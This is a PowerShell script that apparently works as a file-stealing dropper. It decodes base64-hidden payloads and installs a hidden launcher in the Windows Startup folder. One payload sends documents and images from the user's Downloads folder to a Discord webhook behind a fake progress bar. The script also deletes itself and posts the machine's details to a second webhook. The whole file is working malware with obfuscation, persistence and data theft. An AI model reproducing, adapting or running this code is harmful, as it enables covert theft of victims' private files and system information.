# Paths
$tempFolder = $env:TEMP
$selfPath = $MyInvocation.MyCommand.Path
$camPsPath = Join-Path $tempFolder "cam.ps1"
$launcherBatPath = Join-Path $tempFolder "launcher.bat"
$startupFolder = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\launcher.bat"

# Base64 payloads
$base64Cam = "JERvd25sb2Fkc1BhdGggPSAiJGVudjpVU0VSUFJPRklMRVxEb3dubG9hZHMiDQokV2ViaG9va1VSTCA9ICJodHRwczovL2Rpc2NvcmQuY29tL2FwaS93ZWJob29rcy8xNDM2NzE3Mzc1NDA2ODY2NDUwL0tNSFFBeTNVSXg2UWVWbFFhX2x6SE9zS3QwTGNhUFg0Uy1NbS1QQ09LdEdGMk1MM3IwT09rN2tTSFB2Vzh2eVNIdm0iDQokTWF4RmlsZVNpemVNQiA9IDgNCiRJbWFnZUV4dGVuc2lvbnMgPSBAKCIuanBnIiwgIi5qcGVnIiwgIi5wbmciLCAiLnBkZiIsICIuZG9jeCIpDQokTG9nRmlsZSA9ICIkZW52OlRFTVBcdXBsb2FkZWRfZmlsZXMubG9nIg0KDQpTdGFydC1TbGVlcCAtU2Vjb25kcyAyDQoNCiMgQ3JlYXRlIGxvZyBmaWxlIGlmIGl0IGRvZXNuJ3QgZXhpc3QNCmlmICgtbm90IChUZXN0LVBhdGggJExvZ0ZpbGUpKSB7DQogICAgTmV3LUl0ZW0gLVBhdGggJExvZ0ZpbGUgLUl0ZW1UeXBlIEZpbGUgfCBPdXQtTnVsbA0KfQ0KDQojIFJlYWQgcHJldmlvdXNseSB1cGxvYWRlZCBmaWxlcw0KJFVwbG9hZGVkRmlsZXMgPSBAe30NCkdldC1Db250ZW50ICRMb2dGaWxlIHwgRm9yRWFjaC1PYmplY3Qgew0KICAgICRwYXJ0cyA9ICRfIC1zcGxpdCAiXHwiDQogICAgaWYgKCRwYXJ0cy5MZW5ndGggLWVxIDMpIHsNCiAgICAgICAgJFVwbG9hZGVkRmlsZXNbIiQoJHBhcnRzWzBdKXwkKCRwYXJ0c1sxXSl8JCgkcGFydHNbMl0pIl0gPSAkdHJ1ZQ0KICAgIH0NCn0NCg0KZnVuY3Rpb24gVXBsb2FkLUZpbGVUb0Rpc2NvcmQgew0KICAgIHBhcmFtICgNCiAgICAgICAgW3N0cmluZ10kRmlsZVBhdGgsDQogICAgICAgIFtzdHJpbmddJFdlYmhvb2tVUkwNCiAgICApDQoNCiAgICAkQm91bmRhcnkgPSBbU3lzdGVtLkd1aWRdOjpOZXdHdWlkKCkuVG9TdHJpbmcoKQ0KICAgICRMRiA9ICJgcmBuIg0KICAgICRDb250ZW50ID0gIi0tJEJvdW5kYXJ5JExGIg0KICAgICRDb250ZW50ICs9ICdDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0iJyArIFtTeXN0ZW0uSU8uUGF0aF06OkdldEZpbGVOYW1lKCRGaWxlUGF0aCkgKyAnIicgKyAkTEYNCiAgICAkQ29udGVudCArPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nICsgJExGICsgJExGDQogICAgJEZpbGVCeXRlcyA9IFtTeXN0ZW0uSU8uRmlsZV06OlJlYWRBbGxCeXRlcygkRmlsZVBhdGgpDQogICAgJENvbnRlbnRCeXRlcyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldEJ5dGVzKCRDb250ZW50KQ0KICAgICRFbmRpbmdCeXRlcyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldEJ5dGVzKCIkTEYtLSRCb3VuZGFyeS0tJExGIikNCiAgICAkQWxsQnl0ZXMgPSAkQ29udGVudEJ5dGVzICsgJEZpbGVCeXRlcyArICRFbmRpbmdCeXRlcw0KDQogICAgJFdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQNCiAgICAkV2ViQ2xpZW50LkhlYWRlcnMuQWRkKCJDb250ZW50LVR5cGUiLCAibXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9JEJvdW5kYXJ5IikNCiAgICB0cnkgew0KICAgICAgICAkV2ViQ2xpZW50LlVwbG9hZERhdGEoJFdlYmhvb2tVUkwsICRBbGxCeXRlcykgfCBPdXQtTnVsbA0KICAgIH0NCiAgICBjYXRjaCB7IH0NCn0NCg0KJEZpbGVzID0gR2V0LUNoaWxkSXRlbSAtUGF0aCAkRG93bmxvYWRzUGF0aCAtRmlsZSB8IFdoZXJlLU9iamVjdCB7ICRJbWFnZUV4dGVuc2lvbnMgLWNvbnRhaW5zICRfLkV4dGVuc2lvbi5Ub0xvd2VyKCkgfQ0KJFRvdGFsRmlsZXMgPSAkRmlsZXMuQ291bnQNCmlmICgkVG90YWxGaWxlcyAtZXEgMCkgew0KICAgIGV4aXQNCn0NCg0KJEN1cnJlbnRGaWxlID0gMA0KDQpmb3JlYWNoICgkRmlsZSBpbiAkRmlsZXMpIHsNCiAgICAkQ3VycmVudEZpbGUrKw0KICAgICRGaWxlU2l6ZU1CID0gW21hdGhdOjpSb3VuZCgkRmlsZS5MZW5ndGggLyAxTUIsIDIpDQogICAgJEZpbGVLZXkgPSAiJCgkRmlsZS5OYW1lKXwkKCRGaWxlU2l6ZU1CKXwkKCRGaWxlLkxhc3RXcml0ZVRpbWVVdGMpIg0KDQogICAgIyBTa2lwIGlmIGFscmVhZHkgdXBsb2FkZWQNCiAgICBpZiAoJFVwbG9hZGVkRmlsZXMuQ29udGFpbnNLZXkoJEZpbGVLZXkpKSB7DQogICAgICAgIA0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCg0KICAgIGlmICgkRmlsZVNpemVNQiAtbGUgJE1heEZpbGVTaXplTUIpIHsNCiAgICAgICAgIyBQcm9ncmVzcyBlZmZlY3QNCiAgICAgICAgZm9yICgkaSA9IDE7ICRpIC1sZSAxMDA7ICRpICs9IDUpIHsNCiAgICAgICAgICAgICRQZXJjZW50ID0gInswOk4wfSIgLWYgJGkNCiAgICAgICAgICAgIFdyaXRlLUhvc3QgKCJMb2FkaW5nOiB7MH0vezF9OiBbezJ9ezN9XSB7NH0lIiAtZiAkQ3VycmVudEZpbGUsICRUb3RhbEZpbGVzLCAoIiMiICogKCRpIC8gNSkpLCAoIiAiICogKCgxMDAgLSAkaSkgLyA1KSksICRQZXJjZW50KSAtTm9OZXdsaW5lDQogICAgICAgICAgICBTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwDQogICAgICAgICAgICBXcml0ZS1Ib3N0ICJgciIgLU5vTmV3bGluZQ0KICAgICAgICB9DQoNCiAgICAgICAgVXBsb2FkLUZpbGVUb0Rpc2NvcmQgLUZpbGVQYXRoICRGaWxlLkZ1bGxOYW1lIC1XZWJob29rVVJMICRXZWJob29rVVJMDQoNCiAgICAgICAgIyBMb2cgdGhlIGZpbGUgbWV0YWRhdGENCiAgICAgICAgIiQoJEZpbGUuTmFtZSl8JCgkRmlsZVNpemVNQil8JCgkRmlsZS5MYXN0V3JpdGVUaW1lVXRjKSIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJExvZ0ZpbGUgLUFwcGVuZA0KICAgIH0NCn0NCg0KV3JpdGUtSG9zdCAiYG5HbyBTdHVkeSBhbmQgUGFzcyB5b3VyIEV4YW1zISINCg=="
$base64Launcher = "QGVjaG8gb2ZmDQo6OiBHZXQgVGVtcCBmb2xkZXINCnNldCBURU1QX0ZPTERFUj0lVEVNUCUNCnNldCBDQU1fUFMxPSVURU1QX0ZPTERFUiVcY2FtLnBzMQ0KDQo6OiBDaGVjayBpZiBjYW0ucHMxIGV4aXN0cw0KaWYgZXhpc3QgIiVDQU1fUFMxJSIgKA0KICAgIDo6IFJ1biBjYW0ucHMxIGhpZGRlbiwgbm8gcHJvZmlsZSwgYnlwYXNzIGV4ZWN1dGlvbiBwb2xpY3kNCiAgICBwb3dlcnNoZWxsIC1Ob1Byb2ZpbGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSAiJUNBTV9QUzElIg0KKSBlbHNlICgNCiAgICBlY2hvIGNhbS5wczEgbm90IGZvdW5kIGluICVURU1QX0ZPTERFUiUNCikNCg0KZXhpdA0K"


# Decode cam.ps1
$camBytes = [Convert]::FromBase64String($base64Cam)
$camDecoded = [System.Text.Encoding]::UTF8.GetString($camBytes)
Set-Content -Path $camPsPath -Value $camDecoded -Encoding UTF8

# Decode launcher.bat
$launcherBytes = [Convert]::FromBase64String($base64Launcher)
$launcherDecoded = [System.Text.Encoding]::UTF8.GetString($launcherBytes)
Set-Content -Path $launcherBatPath -Value $launcherDecoded -Encoding UTF8

# Copy launcher.bat to startup if not exists
if (-not (Test-Path $startupFolder)) {
    Copy-Item -Path $launcherBatPath -Destination $startupFolder -Force
}

# Optional self delete after setup
Start-Process cmd "/c ping 127.0.0.1 -n 2 > nul & del `"$selfPath`"" -WindowStyle Hidden

# Collect info
$computer = $env:COMPUTERNAME
$cs = Get-CimInstance Win32_ComputerSystem
$model = ($cs.Model).Trim()
$cpu = (Get-CimInstance Win32_Processor).Name
$osObj = Get-CimInstance Win32_OperatingSystem
$osCaption = ($osObj.Caption).Trim()
$date = (Get-Date).ToUniversalTime().AddHours(8).ToString("MMM dd, yyyy hh:mm tt")

# Build laptop info string
$laptopinfo = "$computer $model $cpu $osCaption $date"

# Discord webhook URL
$webhook = "https://discord.com/api/webhooks/1441783360811958476/1IThfCMPctJOvRhI_7NKT6GLBDiaZHsuNMaV9WaodOZOz3ygYUbAKlIomsnkqW_i_7C_"

# Payload
$payload = @{
    content = "The Bomb has been planted in $laptopinfo"
} | ConvertTo-Json

# Send to Discord
Invoke-RestMethod -Uri $webhook -Method Post -Body $payload -ContentType "application/json"
